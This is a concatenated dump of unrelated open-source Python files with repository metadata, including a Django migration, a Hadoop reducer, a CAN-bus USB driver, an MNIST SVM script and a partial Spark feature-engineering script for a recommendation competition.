            totalVolume = 0
            for vol in volumes:
                totalVolume +=vol
            print 'Total Volume :', totalVolume
            # Volume-weighted average of the per-polygon centroids.
            centerMass = om.MVector()
            for i in range(mFnMesh.numPolygons()):
                centerMass += centers[i]*volumes[i]
            centerMass = centerMass / totalVolume
            print centerMass.x, centerMass.y,centerMass.z
            # Move the 'comLoc' locator to the computed center of mass.
            mSelList.add('comLoc')
            mComLoc = om.MDagPath()
            mSelList.getDagPath(1,mComLoc)
            mTransformComLoc = om.MFnTransform(mComLoc)
            print mComLoc.fullPathName()
            mTransformComLoc.translateBy(centerMass,om.MSpace.kWorld)

bdGetComMain()
|
[
"ender_bd@yahoo.com"
] |
ender_bd@yahoo.com
|
550be29c5bc9d3a289d807df0b4515fa7991f024
|
196cd24f0dcd927779a42a39a5395baa3e3ad9dc
|
/groups/migrations/0004_auto_20200726_1934.py
|
0379bc6dc5af9c21d553711693e9195ceabf0c65
|
[
"MIT"
] |
permissive
|
Hedera-Lang-Learn/hedera
|
d38ac067ebcfa774eb8a916e20144d5e2a079c57
|
f44773bcf7695f4f73f0cd71daed7767902bcfd4
|
refs/heads/dev
| 2023-06-23T01:41:02.429563
| 2023-06-13T20:17:24
| 2023-06-13T20:17:24
| 154,722,012
| 9
| 3
|
MIT
| 2023-06-13T20:17:25
| 2018-10-25T18:53:59
|
Python
|
UTF-8
|
Python
| false
| false
| 844
|
py
|
# Generated by Django 2.2.13 on 2020-07-26 19:34

from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone


class Migration(migrations.Migration):
    """Add created_at / created_by audit fields to Group.

    NOTE(review): `default=True` on a ForeignKey is odd (a boolean for an FK
    default); it is harmless here because null=True, but verify intent.
    """

    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
        ('groups', '0003_auto_20200603_1933'),
    ]

    operations = [
        migrations.AddField(
            model_name='group',
            name='created_at',
            field=models.DateTimeField(default=django.utils.timezone.now),
        ),
        migrations.AddField(
            model_name='group',
            name='created_by',
            field=models.ForeignKey(default=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='created_classes', to=settings.AUTH_USER_MODEL),
        ),
    ]
|
[
"paltman@gmail.com"
] |
paltman@gmail.com
|
da278ac32c41ed3843c40753b8dcdc5c5ea6c64f
|
272a078b59a1a780ab7cccf4e2741fcd447ca37c
|
/examples/streaming/wordCount/reducer.py
|
39ec1edf7accec778833f3e52b165c3600a8bfbd
|
[] |
no_license
|
casunlight/hadoop-tutorial
|
12dd2594b0990ad452bee01de0a2b6ceabe92501
|
6d45091fc92d39fe495f3f1a69acc493e2fe0c60
|
refs/heads/master
| 2020-03-26T22:11:56.028574
| 2018-11-26T00:20:41
| 2018-11-26T00:20:41
| 145,439,797
| 2
| 2
| null | 2018-09-11T18:26:26
| 2018-08-20T15:59:39
|
Shell
|
UTF-8
|
Python
| false
| false
| 1,076
|
py
|
#!/usr/bin/python
"""Hadoop-streaming word-count reducer.

Reads tab-separated "word\tcount" lines from stdin (already sorted by word,
as Hadoop guarantees between map and reduce) and emits one aggregated
"word\tcount" line per distinct word.
"""
from __future__ import print_function
import sys

#variable initialization
current_word = None
current_count = 0
word = None

# takes input stdin
for line in sys.stdin:
    # trim any leading and trailing spaces
    line = line.strip()

    # split the input from mapper.py and take the word and its count
    word, count = line.split('\t', 1)

    # convert count string to int
    try:
        count = int(count)
    except ValueError:
        # in case of exception
        # ignore the exception and discard the input line
        continue

    # this IF-switch only works because Hadoop sorts map output
    # by key (here: word) before it is passed to the reducer
    if current_word == word:
        current_count += count
    else:
        if current_word:
            # write result to STDOUT
            print('{}\t{}'.format(current_word, current_count))
        current_count = count
        current_word = word

# do not forget to output the last word if needed!
if current_word == word:
    print('{}\t{}'.format(current_word, current_count))
|
[
"yanshu.usc@gmail.com"
] |
yanshu.usc@gmail.com
|
8706dd9534d6b4516529a80ef067267221875e06
|
aca65ed6f3c7e347adb9923fa78da77497624930
|
/ex11.py
|
03b2cc71ce6a496f5d1cdcbe77ee9e375f4c850b
|
[] |
no_license
|
bunnybryna/Learn_Python_The_Hard_Way
|
516bb76ced2569ea27d9ce50c5d5bc00eeb5740d
|
c4aeece3b819a228acb2fb77f29551a8683331c4
|
refs/heads/master
| 2021-01-11T18:04:41.477498
| 2017-01-23T17:42:28
| 2017-01-23T17:42:28
| 79,486,036
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 287
|
py
|
print "How old are you? (year)",
age = raw_input()
print "How tall are you? (centimeter)",
height = raw_input()
print "How much do you weigh? (kilogram)",
weight = raw_input()
print "So ,you're %s years old, %s centimeters tall and %s kilograms heavy." % (
age, height, weight)
|
[
"brynazhao@gmail.com"
] |
brynazhao@gmail.com
|
79fecc2c9c41f461be00ccb461bdb9cef9e811f3
|
6bb45c5892b4c9692dcc44116fb73dc9e7ab90ff
|
/advanced_functionality/scikit_learn_bring_your_own_model/code/inference.py
|
586143a9c2d8e619fe940d1c6006ddefc83d208a
|
[
"Apache-2.0",
"BSD-2-Clause"
] |
permissive
|
aws/amazon-sagemaker-examples
|
8359afe544e873662bda5b8d2b07399c437213c9
|
43dae4b28531cde167598f104f582168b0a4141f
|
refs/heads/main
| 2023-08-26T04:42:52.342776
| 2023-08-25T14:37:19
| 2023-08-25T14:37:19
| 107,937,815
| 4,797
| 3,519
|
Apache-2.0
| 2023-09-14T19:47:03
| 2017-10-23T05:55:22
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 487
|
py
|
import os
import joblib
def predict_fn(input_object, model):
    """SageMaker inference hook: run the loaded model on the incoming payload.

    input_object -- deserialized request payload
    model        -- estimator returned by model_fn; must expose .predict()
    """
    ###########################################
    # Do your custom preprocessing logic here #
    ###########################################

    print("calling model")
    return model.predict(input_object)
def model_fn(model_dir):
    """SageMaker model-loading hook: deserialize model.joblib from model_dir."""
    print("loading model.joblib from: {}".format(model_dir))
    artifact_path = os.path.join(model_dir, "model.joblib")
    return joblib.load(artifact_path)
|
[
"noreply@github.com"
] |
aws.noreply@github.com
|
c1064e3cb0f46ad7adf774bda864f9f66f8de8ed
|
9beb6276f17e5d174b7827ee73974d65bf302c60
|
/scrumate/core/migrations/0009_auto_20190520_2336.py
|
6272f5158163f4f19adf7687aa847632d70b4dee
|
[
"MIT"
] |
permissive
|
nahidsaikat/scrumate
|
8a3bec242b5b6ff02f1a5b8309e777f154e7c338
|
11a63f1cc361261a7023eceafc2a27e29561dca0
|
refs/heads/master
| 2022-01-11T09:20:58.599693
| 2019-07-10T16:57:56
| 2019-07-10T16:57:56
| 169,908,944
| 1
| 0
|
MIT
| 2019-06-02T04:21:56
| 2019-02-09T20:12:45
|
HTML
|
UTF-8
|
Python
| false
| false
| 477
|
py
|
# Generated by Django 2.2.1 on 2019-05-20 23:36

from django.db import migrations, models
import django.db.models.deletion


class Migration(migrations.Migration):
    """Repoint ProjectMember.user at people.Employee with DO_NOTHING deletion.

    Auto-generated; do not hand-edit once applied.
    """

    dependencies = [
        ('core', '0008_auto_20190519_1902'),
    ]

    operations = [
        migrations.AlterField(
            model_name='projectmember',
            name='user',
            field=models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to='people.Employee'),
        ),
    ]
|
[
"nahidsaikatft40@gmail.com"
] |
nahidsaikatft40@gmail.com
|
92b8fbf42cdd9d76c411d6d3cdb66b67393a07a1
|
02024d0d05428da2a1b53862e31fe5bf0d667ba3
|
/qiskit/qasm/_node/_indexedid.py
|
fc87aadf35a174a409d35e133d3f3e49acc07abc
|
[
"Apache-2.0"
] |
permissive
|
nonhermitian/arrogant_seahorse
|
488dd22a200f45f068821ce93422d92dd6bae38c
|
2be1ff60857c75fcbbb0c23aa594f41e1a33c89c
|
refs/heads/master
| 2020-03-12T01:02:59.369571
| 2018-08-08T17:55:13
| 2018-08-08T17:55:13
| 130,365,670
| 0
| 0
|
Apache-2.0
| 2018-05-24T13:43:13
| 2018-04-20T13:26:27
|
Python
|
UTF-8
|
Python
| false
| false
| 1,565
|
py
|
# -*- coding: utf-8 -*-
# pylint: disable=invalid-name
# Copyright 2017 IBM RESEARCH. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =============================================================================
"""
Node for an OPENQASM indexed id.
"""
from ._node import Node
class IndexedId(Node):
    """Node for an OPENQASM indexed id.

    children[0] is an id node.
    children[1] is an Int node.
    """

    def __init__(self, children):
        """Create the indexed id node."""
        Node.__init__(self, 'indexed_id', children, None)
        id_node, index_node = children
        self.id = id_node
        self.name = id_node.name
        self.line = id_node.line
        self.file = id_node.file
        self.index = index_node.value

    def to_string(self, indent):
        """Print with indent."""
        print(indent * ' ', 'indexed_id', self.name, self.index)

    def qasm(self, prec=15):
        """Return the corresponding OPENQASM string."""
        # pylint: disable=unused-argument
        return self.name + "[%d]" % self.index
|
[
"nonhermitian@gmail.com"
] |
nonhermitian@gmail.com
|
b98564429effdf73626a3ffe5b14362282c0ce78
|
d5f75adf5603927396bdecf3e4afae292143ddf9
|
/python/paddle/fluid/tests/unittests/distributed_passes/test_dist_fuse_adam_pass.py
|
85c3bf321a3b1b100f593ba527698605a85570af
|
[
"Apache-2.0"
] |
permissive
|
jiweibo/Paddle
|
8faaaa1ff0beaf97ef7fb367f6c9fcc065f42fc4
|
605a2f0052e0ffb2fab3a4cf4f3bf1965aa7eb74
|
refs/heads/develop
| 2023-07-21T03:36:05.367977
| 2022-06-24T02:31:11
| 2022-06-24T02:31:11
| 196,316,126
| 3
| 2
|
Apache-2.0
| 2023-04-04T02:42:53
| 2019-07-11T03:51:12
|
Python
|
UTF-8
|
Python
| false
| false
| 3,358
|
py
|
# Copyright (c) 2022 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import paddle
import paddle.distributed.fleet as fleet
import numpy as np
import paddle.nn as nn
from paddle.distributed.passes import new_pass, PassManager
import unittest
from dist_pass_test_base import DistPassTestBase
class DemoNet(nn.Layer):
    """Tiny conv->batchnorm->relu network (NHWC layout) used as the test model."""

    def __init__(self):
        super(DemoNet, self).__init__()
        self.conv1 = nn.Conv2D(3, 8, (3, 3), data_format="NHWC")
        self.bn1 = nn.BatchNorm2D(8, data_format="NHWC")
        self.relu = nn.ReLU()

    def forward(self, x):
        # conv -> bn -> relu, then flatten everything but the batch dim.
        out = self.conv1(x)
        out = self.bn1(out)
        out = self.relu(out)
        out = paddle.flatten(out, 1)
        return out
class TestFuseAdamPass(DistPassTestBase):
    """Distributed-pass test: checks that the fuse_optimizer pass fuses Adam.

    After applying the pass, Adam ops must consume fused (@FUSEDVAR@) params
    and grads, and a coalesce_tensor op must appear in the main program.
    """

    def init(self):
        # Numeric tolerances used by DistPassTestBase when comparing outputs.
        self.atol = 1e-4
        self.rtol = 1e-4

    def get_model(self, place, batch_size=32, image_shape=[224, 224, 3]):
        """Build the static-graph model, optimizer and feed reader."""
        image = paddle.static.data(shape=[batch_size] + image_shape,
                                   dtype='float32',
                                   name='image')
        model = DemoNet()
        pred_out = model(image)
        loss = paddle.mean(pred_out)
        optimizer = paddle.optimizer.Adam(learning_rate=1e-3)

        dist_strategy = fleet.DistributedStrategy()
        dist_strategy.fuse_all_reduce_ops = False
        dist_strategy.without_graph_optimization = True
        fleet.init(is_collective=True, strategy=dist_strategy)
        optimizer = fleet.distributed_optimizer(optimizer)
        optimizer.minimize(loss)

        rank = paddle.distributed.get_rank()

        def reader():
            # Deterministic per-rank random batches (seed offset by rank).
            seed = int(os.environ.get("SEED", 0))
            np.random.seed(seed + rank)
            for _ in range(10):
                image_np = np.random.random(size=image.shape).astype('float32')
                yield image_np,

        main_program = paddle.static.default_main_program()
        startup_program = paddle.static.default_startup_program()
        return main_program, startup_program, [image], [loss], reader

    def apply_passes(self, main_prog, startup_prog):
        """Apply fuse_optimizer and assert the fused-var rewrite took place."""
        pass_manager = PassManager([new_pass("fuse_optimizer")])
        pass_manager.apply([main_prog], [startup_prog])
        print(pass_manager.names)

        op_type = []
        for op in main_prog.global_block().ops:
            op_type.append(op.type)
            if op.type == "adam":
                # Fused optimizer must read the @FUSEDVAR@ param/grad buffers.
                self.assertTrue("@FUSEDVAR@_adam_Param_batch_norm2d_0.b_0" in
                                op.input("Param"))
                self.assertTrue("@FUSEDVAR@_adam_Grad_batch_norm2d_0.b_0@GRAD"
                                in op.input("Grad"))
        self.assertTrue("coalesce_tensor" in op_type)

    def test_fuse_adam(self):
        self.check_main()


if __name__ == "__main__":
    unittest.main()
|
[
"noreply@github.com"
] |
jiweibo.noreply@github.com
|
37818cd5fcee6a28165e777da8c232aab06642b5
|
7740adda52651a443e5141b331d4eaadbd0d0d2c
|
/chap11/11-5.py
|
a1ff82139212f7ae8500386e95508159daeca5f9
|
[] |
no_license
|
wucy/pythonhomework
|
f55b24e6e702718243f8cd534dc7d3c2eb9f9fce
|
1cfcac532a229ce71982ed3cfef9f75a531ffa64
|
refs/heads/master
| 2016-09-10T20:30:37.367056
| 2013-11-28T14:20:03
| 2013-11-28T14:20:03
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 192
|
py
|
#!/usr/bin/env python


def invert_dict(hist):
    """Invert a mapping: return {value: [keys that mapped to that value]}.

    Keys sharing a value are grouped in the dict's iteration order.
    """
    inverted = dict()
    for key in hist:
        inverted.setdefault(hist[key], []).append(key)
    return inverted


# Parenthesized single-argument call prints identically on Python 2 and 3
# (the original `print invert_dict(...)` statement is a SyntaxError on 3.x).
print(invert_dict({'a': 1, 'b': 2, 'c': 2}))
|
[
"chunyang506@gmail.com"
] |
chunyang506@gmail.com
|
a648cbdbf5a1d98beba96b3483ee9e97504bb830
|
fcf91774105f020482c3c07632c0ee462a6d1394
|
/uwiki/web.py
|
57dd594e358c2811ee30d858e2da8fbd0247f7c4
|
[] |
no_license
|
mikeboers/uWiki
|
fcac466e82d16b2ed219d06b834b766e7a9de43e
|
3c9b0a7ab07a550f52f5d5d38105df901d5a3801
|
refs/heads/master
| 2023-06-08T05:53:50.066814
| 2018-03-05T18:03:45
| 2018-03-05T18:03:45
| 15,181,192
| 4
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 179
|
py
|
# Application bootstrap module: importing it wires up logging, error pages,
# and the route controllers as side effects.
import logging
logging.basicConfig()

from .core import app
from .errors import setup_errors
setup_errors(app)

# Finally register controllers here.
from . import controllers
|
[
"github@mikeboers.com"
] |
github@mikeboers.com
|
5d90971c9ca58a4817368468e0ff0c99c19b099e
|
14438f8c8bb4250a7fa8da0ecd40c5a4902bdfcd
|
/Player/set-17/165.py
|
9a3d792ecbd4593b145a5f3556d0c0b9183b56ef
|
[] |
no_license
|
nikhilvarshney2/GUVI
|
c51b1fa3bd1026eb74fc536e938a14c2e92089b2
|
79717ae5b26540101169e512204fb7236f7c839f
|
refs/heads/master
| 2020-04-01T00:40:27.699963
| 2019-04-30T13:46:46
| 2019-04-30T13:46:46
| 152,707,542
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 150
|
py
|
# Read n and u, then a list of ints; print the smallest element strictly
# greater than u. NOTE(review): 100000 is both the "not found" sentinel and
# an implicit upper bound -- values >= 100000 can never be selected; verify
# against the problem's constraints.
n,u = map(int,input().split())
kl = list(map(int,input().split()))
found = 100000
for i in kl:
    if i>u and i<found:
        found = i
print(found)
|
[
"nikhilvarshney9292@gmail.com"
] |
nikhilvarshney9292@gmail.com
|
5a9d027ff8cc18ecab56ba138f3d711c9d7f3eff
|
64a673e2e84c962ae4ab312b7f011e13f7d2df55
|
/lib/panda.py
|
516fb243713e658ac807e6c24b5e57f96070de17
|
[
"MIT"
] |
permissive
|
ScienceXChina/panda
|
c00960901246627d643cdf33ee81066988a15fdb
|
efca3f70939d4c2d3c8c0901536e9d89a5bbcbd6
|
refs/heads/master
| 2021-01-19T20:50:57.597486
| 2017-04-18T01:17:34
| 2017-04-18T01:17:34
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,274
|
py
|
# python library to interface with panda
import struct
import usb1
from usb1 import USBErrorIO, USBErrorOverflow


class Panda(object):
    """Python 2 USB driver for the panda CAN interface (VID 0xbbaa, PID 0xddcc).

    NOTE: the class continues past this excerpt (kline helpers follow).
    """

    def __init__(self, serial=None, claim=True):
        # Open the first matching device (or the one with the given serial).
        context = usb1.USBContext()
        self.handle = None
        for device in context.getDeviceList(skip_on_error=True):
            if device.getVendorID() == 0xbbaa and device.getProductID() == 0xddcc:
                if serial is None or device.getSerialNumber() == serial:
                    print "opening device", device.getSerialNumber()
                    self.handle = device.open()
                    if claim:
                        self.handle.claimInterface(0)
                    break
        assert self.handle != None

    @staticmethod
    def list():
        """Return the serial numbers of all attached panda devices."""
        context = usb1.USBContext()
        ret = []
        for device in context.getDeviceList(skip_on_error=True):
            if device.getVendorID() == 0xbbaa and device.getProductID() == 0xddcc:
                ret.append(device.getSerialNumber())
        return ret

    # ******************* health *******************

    def health(self):
        """Read the 0xd2 vendor control request and unpack the health struct."""
        dat = self.handle.controlRead(usb1.TYPE_VENDOR | usb1.RECIPIENT_DEVICE, 0xd2, 0, 0, 0x20)
        a = struct.unpack("IIBBBBB", dat)
        return {"voltage": a[0], "current": a[1],
                "started": a[2], "controls_allowed": a[3],
                "gas_interceptor_detected": a[4],
                "started_signal_detected": a[5],
                "started_alt": a[6]}

    # ******************* can *******************

    def set_gmlan(self, on):
        # Vendor request 0xdb toggles GMLAN mode (value 1 = on, 0 = off).
        if on:
            self.handle.controlWrite(usb1.TYPE_VENDOR | usb1.RECIPIENT_DEVICE, 0xdb, 1, 0, '')
        else:
            self.handle.controlWrite(usb1.TYPE_VENDOR | usb1.RECIPIENT_DEVICE, 0xdb, 0, 0, '')

    def can_send_many(self, arr):
        """Send many CAN frames; arr items are (addr, _, data, bus). Retries on USB errors."""
        snds = []
        for addr, _, dat, bus in arr:
            # 16-byte wire format: packed header (addr<<21 | 1, len | bus<<4) + payload.
            snd = struct.pack("II", ((addr << 21) | 1), len(dat) | (bus << 4)) + dat
            snd = snd.ljust(0x10, '\x00')
            snds.append(snd)
        while 1:
            try:
                self.handle.bulkWrite(3, ''.join(snds))
                break
            except (USBErrorIO, USBErrorOverflow):
                print "CAN: BAD SEND MANY, RETRYING"

    def can_send(self, addr, dat, bus):
        """Send a single CAN frame."""
        self.can_send_many([[addr, None, dat, bus]])

    def can_recv(self):
        """Bulk-read up to 256 frames; returns (addr, ts, data, bus) tuples."""
        def __parse_can_buffer(dat):
            ret = []
            for j in range(0, len(dat), 0x10):
                ddat = dat[j:j+0x10]
                f1, f2 = struct.unpack("II", ddat[0:8])
                # addr = f1 >> 21; ts = f2 >> 16; payload length in low nibble of f2.
                ret.append((f1 >> 21, f2>>16, ddat[8:8+(f2&0xF)], (f2>>4)&0xf))
            return ret
        dat = ""
        while 1:
            try:
                dat = self.handle.bulkRead(1, 0x10*256)
                break
            except (USBErrorIO, USBErrorOverflow):
                print "CAN: BAD RECV, RETRYING"
        return __parse_can_buffer(dat)

    # ******************* serial *******************

    def serial_read(self, port_number):
        # Vendor request 0xe0 reads up to 0x100 bytes from the given UART.
        return self.handle.controlRead(usb1.TYPE_VENDOR | usb1.RECIPIENT_DEVICE, 0xe0, port_number, 0, 0x100)

    def serial_write(self, port_number):
        # NOTE(review): `ln` is undefined here -- this always raises NameError;
        # the payload was presumably meant to be a parameter. Needs the true
        # signature from upstream before fixing.
        return self.handle.bulkWrite(2, chr(port_number) + ln)
# ******************* kline *******************
# pulse low for wakeup
def kline_wakeup(self):
ret = self.handle.controlWrite(usb1.TYPE_VENDOR | usb1.RECIPIENT_DEVICE, 0xf0, 0, 0, "")
def kline_drain(self, bus=2):
# drain buffer
bret = ""
while 1:
ret = self.handle.controlRead(usb1.TYPE_VENDOR | usb1.RECIPIENT_DEVICE, 0xe0, bus, 0, 0x100)
if len(ret) == 0:
break
bret += str(ret)
return bret
def kline_ll_recv(self, cnt, bus=2):
echo = ""
while len(echo) != cnt:
echo += str(self.handle.controlRead(usb1.TYPE_VENDOR | usb1.RECIPIENT_DEVICE, 0xe0, bus, 0, cnt-len(echo)))
return echo
def kline_send(self, x, bus=2, checksum=True):
def get_checksum(dat):
result = 0
result += sum(map(ord, dat))
result = -result
return chr(result&0xFF)
self.kline_drain(bus=bus)
if checksum:
x += get_checksum(x)
for i in range(0, len(x), 0x10):
ts = x[i:i+0x10]
self.handle.bulkWrite(2, chr(bus)+ts)
echo = self.kline_ll_recv(len(ts), bus=bus)
if echo != ts:
print "**** ECHO ERROR %d ****" % i
print echo.encode("hex")
print ts.encode("hex")
assert echo == ts
def kline_recv(self, bus=2):
msg = self.kline_ll_recv(2, bus=bus)
msg += self.kline_ll_recv(ord(msg[1])-2, bus=bus)
return msg
|
[
"george@comma.ai"
] |
george@comma.ai
|
2224a59c364b7d23fe7e1fda9e1c4882185ad1a2
|
7c8bff784568691c516833ac81afc967857d24e2
|
/jacc/migrations/0013_auto_20180329_1052.py
|
416bb15ffddf4f84db0de59def8ab08f641d0a94
|
[
"MIT"
] |
permissive
|
kajala/django-jacc
|
b71f2c3df1321b9bb31e1e648895931b735949a6
|
4acb8ca2d32b11fd5afa3b5316b13be223b20ec6
|
refs/heads/develop
| 2023-08-18T14:12:38.196880
| 2023-08-11T15:18:57
| 2023-08-11T15:18:57
| 121,229,896
| 11
| 5
|
MIT
| 2021-07-12T15:02:36
| 2018-02-12T10:02:20
|
Python
|
UTF-8
|
Python
| false
| false
| 458
|
py
|
# Generated by Django 2.0.2 on 2018-03-29 10:52
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
("jacc", "0012_auto_20180218_0638"),
]
operations = [
migrations.AlterField(
model_name="invoice",
name="number",
field=models.BigIntegerField(blank=True, db_index=True, default=None, null=True, verbose_name="invoice number"),
),
]
|
[
"kajala@gmail.com"
] |
kajala@gmail.com
|
832aa0d3c90861062ce69cb90cf22a074676b793
|
0e2994b2b6ffe318081274eff6425573f1ab953e
|
/argus-freesound-master/stacking_kernel_template.py
|
5872f6d63621c45783150d2611f315b29cf299b0
|
[
"MIT"
] |
permissive
|
Ramstein/castme-transform-prediction-via-adversarial-network
|
4f6b1f3c953c9686ca2a77aef27891089e9a687e
|
361369fcb75f7c90b3e276d88e547cbba3402ea6
|
refs/heads/master
| 2023-07-15T14:12:18.842595
| 2021-09-07T18:08:01
| 2021-09-07T18:08:01
| 404,077,475
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 579
|
py
|
import gzip
import base64
import os
from pathlib import Path
from typing import Dict
KERNEL_MODE = "predict"
# this is base64 encoded source code
file_data: Dict = {file_data}
for path, encoded in file_data.items():
print(path)
path = Path(path)
path.parent.mkdir(parents=True, exist_ok=True)
path.write_bytes(gzip.decompress(base64.b64decode(encoded)))
def run(command):
os.system('export PYTHONPATH=${PYTHONPATH}:/kaggle/working && '
f'export MODE={KERNEL_MODE} && ' + command)
run('python stacking_predict.py')
run('rm -rf argus src')
|
[
"gerialworld@gmail.com"
] |
gerialworld@gmail.com
|
2f1de19f501102cdfb600897d1579f3d81ec4fa5
|
e376eb34db5eaf17608f2ebf22ecd796b836a7b1
|
/HW2/test-svm.py
|
8d0329207c8d1943a577aa163eee04f3156d8646
|
[] |
no_license
|
yshsu0918/MachineLearning2020
|
5b8babad41d9d377d0ccf33b4b4a1c4e6e572bfa
|
f953492ae85941d81f675eaa21daf8fadfa227b3
|
refs/heads/master
| 2023-02-11T18:44:11.319760
| 2020-12-25T03:53:49
| 2020-12-25T03:53:49
| 324,283,077
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,837
|
py
|
from sklearn import svm
import numpy as np
import struct
import time
def decode_idx3_ubyte(idx3_ubyte_file,dataset_size):
f = open(idx3_ubyte_file, 'rb').read()
mem_offset = 16
images = []
for i in range(dataset_size):
if (i+1) % (dataset_size/100) == 0:
print('#', end='')
images.append( np.array(struct.unpack_from('>784B', f, mem_offset)).reshape((28, 28)))
mem_offset += (784)
return images
def decode_idx1_ubyte(idx1_ubyte_file,dataset_size):
f = open(idx1_ubyte_file, 'rb').read()
mem_offset = 8
labels = []
for i in range(dataset_size):
if (i+1) % (dataset_size/100) == 0:
print('#', end='')
labels.append( struct.unpack_from('>B', f, mem_offset)[0] )
mem_offset += 1
return labels
train_image = decode_idx3_ubyte('train-images.idx3-ubyte',60000)
train_label = decode_idx1_ubyte('train-labels.idx1-ubyte',60000)
print('load train done')
test_image = decode_idx3_ubyte('t10k-images.idx3-ubyte',10000)
test_label = decode_idx1_ubyte('t10k-labels.idx1-ubyte',10000)
print('load test done')
#mnist = input_data.read_data_sets('MNIST_data', one_hot=False)
train_num = 60000
test_num = 10000
x_train = [ x.reshape(28*28) for x in train_image]
y_train = train_label
x_test = [ x.reshape(28*28) for x in test_image]
y_test = test_label
tStart = time.time()
# 獲取一個支援向量機模型
print('1')
predictor = svm.SVC(kernel='linear', verbose=True, max_iter = 1000)
# 把資料丟進去
print('2')
predictor.fit(x_train[:train_num], y_train[:train_num])
# 預測結果
print('3')
result = predictor.predict(x_test[:test_num])
# 準確率估計
print('4')
accurancy = np.sum(np.equal(result, y_test[:test_num])) / test_num
print(accurancy)
tEnd = time.time()
print('SVM use {} seconds'.format(tEnd - tStart))
|
[
"a@b.c"
] |
a@b.c
|
6b04c699eb03528f3243f106a6d49ded0dc8d86a
|
cda0f7f4e9e19aeb03148b71b9e4ac924a4b4814
|
/onspark_generate_feature_user.py
|
ca86b74cb9b58f4ddeff0f30aece89b7ac8ba727
|
[] |
no_license
|
00fq00/competition_tianchi
|
32a4f59340d96955d8056daa5fe67d6079c36f8e
|
fb45aaa412ddba5b69555ecfd75c3aa462fe2489
|
refs/heads/master
| 2021-01-19T21:12:41.887958
| 2017-03-03T09:00:27
| 2017-03-03T09:00:27
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,331
|
py
|
# -*- coding: utf-8 -*-
import sys
from operator import add
from pyspark import SparkConf
from pyspark import SparkContext
from sklearn.svm import SVC
from sklearn.svm import LinearSVC
from sklearn.pipeline import Pipeline
from sklearn.ensemble import RandomForestClassifier, GradientBoostingClassifier
####################################################################################
############################ 用户特征 ############################
####################################################################################
def extract1(line):
import time
(uid, iid, ict) = line.strip().split("\t")[0].split(" ")
items = filter(lambda x:x[0]>0, [(int(time.mktime(time.strptime('2014-'+etime,'%Y-%m-%d-%H'))-time.mktime(time.strptime('2014-'+i.split(",")[0],'%Y-%m-%d-%H')))/(24*3600)+1, int(i.split(",")[1])) for i in line.strip().split("\t")[1].split(" ")])
return (uid,items)
def extract2(items_list):
import itertools
items, items_buy, items_buy_3, f, inf = [], [], [], [0]*39, 100
f[32] = len(items_list) # 交互商品数
for i in items_list:
if len(filter(lambda x:x[1]==4,i))>0:
items_buy.append(i)
if len(filter(lambda x:x[1]==4 and x[0]<=3,i))>0:
items_buy_3.append(i)
items.extend(i)
f[33] = len(items_buy) # 购买商品数
f[34] = len(items_buy_3) # 三天内购买商品数
f[35] = len(filter(lambda x:len(x)==1,items_list)) # 只有过一次交互的商品数
f[36] = len(filter(lambda x:len(x)==2,items_list)) # 有过两次交互的商品数
f[37] = len(filter(lambda x:len(x)==3,items_list)) # 有过三次交互的商品数
items = sorted(items, key=lambda x:x[0], reverse=True)
buy = filter(lambda x:x[1]==4, items)
last = buy[-1][0] if len(buy)!=0 else inf
f[24] = len(filter(lambda x:x[0]<=1 and x[1]==1, items)) # 最后1天点击次数
f[25] = len(filter(lambda x:x[0]<=1 and x[1]==2, items)) # 最后1天加收次数
f[26] = len(filter(lambda x:x[0]<=1 and x[1]==3, items)) # 最后1天加购次数
f[27] = len(filter(lambda x:x[0]<=1 and x[1]==4, items)) # 最后1天购买次数
f[28] = len(filter(lambda x:x[0]<=3 and x[1]==1, items)) # 最后3天点击次数
f[29] = len(filter(lambda x:x[0]<=3 and x[1]==2, items)) # 最后3天加收次数
f[30] = len(filter(lambda x:x[0]<=3 and x[1]==3, items)) # 最后3天加购次数
f[31] = len(filter(lambda x:x[0]<=3 and x[1]==4, items)) # 最后3天购买次数
f[0] = len(filter(lambda x:x[0]<=7 and x[1]==1, items)) # 最后1周点击次数
f[1] = len(filter(lambda x:x[0]<=7 and x[1]==2, items)) # 最后1周加收次数
f[2] = len(filter(lambda x:x[0]<=7 and x[1]==3, items)) # 最后1周加购次数
f[3] = len(filter(lambda x:x[0]<=7 and x[1]==4, items)) # 最后1周购买次数
f[4] = len(filter(lambda x:x[0]<=21 and x[1]==1, items)) # 最后3周点击次数
f[5] = len(filter(lambda x:x[0]<=21 and x[1]==2, items)) # 最后3周加收次数
f[6] = len(filter(lambda x:x[0]<=21 and x[1]==3, items)) # 最后3周加购次数
f[7] = len(filter(lambda x:x[0]<=21 and x[1]==4, items)) # 最后3周购买次数
f[8] = min(1.0,round(1.0*f[3]/f[0],4)) if f[0]!=0 else 0.0 # 最后1周点击转化率
